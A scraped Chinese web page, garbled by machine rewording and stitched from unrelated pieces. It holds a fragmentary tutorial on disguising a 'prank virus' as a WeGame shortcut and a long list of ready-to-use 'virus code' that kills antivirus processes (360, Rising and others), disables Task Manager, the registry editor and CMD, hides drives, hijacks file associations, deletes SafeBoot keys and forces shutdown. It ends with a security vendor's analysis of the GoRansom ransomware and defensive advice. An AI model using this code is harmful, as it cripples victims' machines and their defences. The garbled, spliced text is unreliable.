这几天急事不太好升级这一，终究必须设计构思。今日升级辣！兄弟萌，还记得关注关心啊，个人收藏我不会奢望了。qaq低贱

制做病原体必须一定的程序编写基本功，必须搞清楚计算机专业語言、电脑杀毒软件的运行 *** 等。自然，还可以根据将撰写好的编码与DOS命令相互配合迅速建立一些没害的病毒程序。

下边将以制做简易的捉弄病原体为例子，详细介绍病原体的 *** 过程。

8.按要求键入后，点击“明确”按键，就可以消除重新启动。

自然，没有人会立即双击鼠标这一不认识的标志。那麼就必须将病原体开展隐藏，根据别的方式让他人开启。

4.在“更改图标”提示框中点击“访问 ”按键

5.寻找必须的标志，以wegame为例子

6.点击明确按键就可以更改图标，随后把快捷方式图标重新命名为wegame就可以了

7.可以吧源代码藏到找不着的地区，还可以在源代码的特性中启用“隐藏”复选择项，点击明确按键

随后大家就可以开心的搞事了，就先写如何多吧，一段时间有时间了在升级嗷。

你了解非常简单的计算机病毒代码是什么吗!简单的代码不易被电脑杀毒软件发觉!下边由小七我让你作出详尽的非常简单的计算机病毒编码详细介绍!期待对给你协助!

非常简单的计算机病毒编码详细介绍：

绕开电脑杀毒软件防御力：

运作 (“taskkill /f /im kavsvc.exe”, 假, 1)

运作 (“taskkill /f /im KVXP.kxp”, 假, 1)

运作 (“taskkill /f /im Rav.exe”, 假, 1)

运作 (“taskkill /f /im Ravmon.exe”, 假, 1)

运作 (“taskkill /f /im Mcshield.exe”, 假, 1)

运作 (“taskkill /f /im VsTskMgr.exe”, 假, 1)

修改系统時间：

置现行标准時间 (到時间 (“8888年8月8日”))

禁止使用资源管理器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr”, 0)

禁止使用注册表文件：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Disableregistrytools”, 1)

隐藏刚开始中的运作 严禁WIN2000/XP根据资源管理器建立新每日任务：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun”, 1)

隐藏“MS-DOS *** ”下的磁盘驱动器。无论是在“我的电脑”里，或“MS-DOS” *** 下都看不到了：

写注册项 (3, “SoftWare \\Microsoft \\Windows \\CurrentVersion \\Policies\\WinOldApp\\Disabled”, 1)

隐藏刚开始中的待机：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose”, 1)

隐藏刚开始中的检索：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind”, 1)

OVER360防御力：

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\ExecAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\MonAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\SiteAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\UDiskAccess”, 0)

完毕360过程

运作 (“taskkill /f /im 360tray.exe”, 假, 1)

隐藏全部控制器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives”, 4294967295)

严禁全部控制器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewOnDrive”, 4294967295)

隐藏文件夹选项：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions”, 1)

将桌面上目标隐藏：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop”, 1)

隐藏刚开始中的待机：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose”, 1)

隐藏刚开始中的检索：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind”, 1)

这条有二种状况。1 禁止使用CMD和.BAT文档 2 禁CMD禁不住.BAT 0开启二项

写注册项

(3, “Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD”, 1)

隐藏首页选择项组：

写注册项 (3, “Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage”, 1)

隐藏IE文档莱单：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu”, 1)

隐藏网址收藏夹莱单：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFavorites”, 1)

禁止使用IE复印作用：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoPrinting”, 1)

隐藏Internet选择项：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions”, 1)

严禁IE查看源文件：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource”, 1)

禁止使用IE免费下载作用：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Interner Settings\\Zones\\3\\1803”, 3)

严禁鼠标右键关系莱单：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu”, 1)

改动文件关联：

写注册项 (1, “.txt\\”, “jpegfile”)

写注册项 (1, “.inf\\”, “jpegfile”)

写注册项 (1, “.reg\\”, “jpegfile”)

写注册项 (1, “.exe\\”, “jpegfile”)

没法进到安全中心：

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{36FC9E60-C465-11CF-8056-444553540000}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E965-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E967-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E969-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96A-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96B-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96F-E325-11CE-BFC1-08002BE10318}\\ ”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Net *** \”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDE

　　Group\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdses *** gr\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network dpipe.sy

　　s\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network dtcp.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network ermservice\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)

　　删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)

　　关机：

　　关闭系统 (2, 假)

　　关机2：

　　运行(“shutdown -s -f ”)

　　以上是学习啦小编给朋友们做出的总结!希望对你们有帮助!

　　近日，瑞星安全专家在国内率先截获了一个病毒样本，由于其他安全厂商并未发布过该勒索病毒，所以瑞星将该勒索病毒样本命名为“GoRansom”。通过分析病毒代码发现，病毒作者来自巴西，声称为了研究勒索病毒原理，居然轻易地将此病毒代码公开？这就意味着，一旦该勒索病毒被其他不法分子利用，将给社会造成非常大的危害。

　　瑞星安全专家称此病毒作者公开代码这个行为非常危险，该勒索病毒代码加密体系已经非常成熟。病毒作者还在两个月前更新了最新的代码，瑞星在 2019 年 1 月 16 号就捕获到了利用此源码生成的病毒exe程序。从捕获日期推测，已经有攻击者在研究测试该病毒。

　　

　　图：病毒作者github主页

　　“GoRansom”勒索病毒采用Go语言开发，使用非对称算法加密文件，病毒运行后会加密指定文件，包括文档、图片、视频等格式文件，被加密文件会被追加上“.encrypted”后缀，然后在桌面释放勒索提示，用户支付赎金解锁文件。目前，瑞星E *** 及瑞星之剑等产品均可对该病毒进行防御和查杀，避免用户文件被病毒加密。

　　

　　图：瑞星E *** 与瑞星之剑成功拦截截图

　　瑞星安全专家提醒广大用户，为了有效防御勒索病毒发起的攻击，建议做到以下几点：

　　1、 不下载可疑程序。

　　2、 不打开来源不明的邮件。

　　3、 及时更新系统补丁。

　　4、 及时修改系统密码，避免使用过于简单的密码。

　　5、 安装杀毒软件，保持防护开启，查杀病毒。

　　6、 安装勒索病毒防御软件，拦截病毒加密文件。

　　病毒详细分析

　　“GoRansom”勒索病毒使用Go语言开发

　　

　　图：病毒包含的Go语言信息

　　运行之后，随机生成用户编号和文件加密时将要用到的AES密钥，通过RSA算法加密密钥和用户编号，发送给控制服务器。

　　

　　图：生成密钥和编号，加密发送给控制服务器

　　发送函数将密钥和编号拼凑后，调用加密函数

　　

　　图：发送函数调用加密函数

　　加密函数将密钥和编号通过RSA算法加密，发给控制服务器

　　

　　图：加密并发送

　　遍历文件准备加密

　　

　　图：遍历文件

　　排除指定的文件夹

　　

　　图：排除的文件夹

　　加密指定的后缀

　　

　　图：加密的后缀

　　使用AES算法加密文件

　　

　　图：使用AES算法加密文件

　　使用base64 算法重命名被加密的文件的文件名，并追加上勒索后缀

　　

　　图：重命名文件，追加上后缀

　　被修改后，后缀追加上.encrypted后缀

　　

　　图：被加密的文件

　　病毒会将被加密文件的原文件名，存放在桌面LIST_OF_FILES.html文件中，用来给受害者展示哪些文件被加密。

　　

　　图：被加密文件的原文件名

　　在桌面释放勒索信息文件README.html

　　

　　图：释放勒索信息

　　勒索信打开后可以看到，攻击者要求受害者支付赎金，并通过文件中留下的邮箱地址联系攻击者，通过留下的比特币钱包地址支付赎金。

　　

　　图：勒索提示信息